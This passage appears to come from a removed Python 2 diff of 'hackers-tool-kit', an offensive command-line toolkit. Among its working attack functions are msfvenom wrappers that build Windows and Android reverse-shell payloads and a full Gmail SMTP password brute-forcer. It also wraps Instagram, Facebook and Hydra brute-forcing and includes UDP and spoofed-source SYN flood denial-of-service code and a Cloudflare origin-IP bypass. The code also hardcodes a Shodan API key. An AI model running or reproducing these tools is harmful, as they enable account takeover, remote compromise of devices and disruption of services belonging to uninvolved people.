\*\033[91m/\033[31m - V\033[0m - """.decode('utf-8') -def mainbanner18(): - print """ - Type \033[31m?\033[0m For\033[31m Help\033[0m -\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ -║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ -║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m -║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ -║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ -╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ - """.decode('utf-8') -def mainbanner19(): - print """\033[31m - # # - # # - %# \033[0m@tuf_unkn0wn\033[31m ## - ,%/ /%, - %## ##% - &%## ##%& - ,%%#####/. ,/#####%%, - %&%%#####/ \033[0m████\033[31m /#####%%&% - .&&%%%&& \033[0m████\033[31m &&%%%&&. - /&%( \033[0m████\033[31m (%&( - \033[0m████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ -██ \033[0m██████████████████████████████\033[31m ██ -███████ \033[0m██████████████████████████████\033[31m ███████ -██ ██ \033[0m████ \033[31m ██ ██ - ██████ \033[0m████ \033[31m ██████ - ▒ ▓▒ ▒ ▒ ▓▒ ▒ - ░ ▒ ░ ██████ ░ ▒ ░ - ░ ░ ██ ░ ░ - ███████ - ██ ██ - ██████ - ▒ ▓▒ ▒ - ░ ▒ ░ - ░ ░\033[0m - """.decode('utf-8') -def mainbanner20(): - print """ - - - ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ - ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ -██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ -╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ - ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ - ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ - Created by @tuf_unkn0wn type ? for help - - """.decode('utf-8') -def mainbanner21(): - os.system("cat /root/hackers-tool-kit/tools/venombanner.txt") - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,21) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() - if num == 17: - mainbanner17() - if num == 18: - mainbanner18() - if num == 19: - mainbanner19() - if num == 20: - mainbanner20() - if num == 21: - mainbanner21() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -update : update the hackers-tool-kit -clear : clears screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -nano : open nano text editor -compilec: compile a c file -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - print "\033[1m\033[33m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" - k = raw_input("MODE> ") - ma = 'python3 /root/hackers-tool-kit/tools/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or 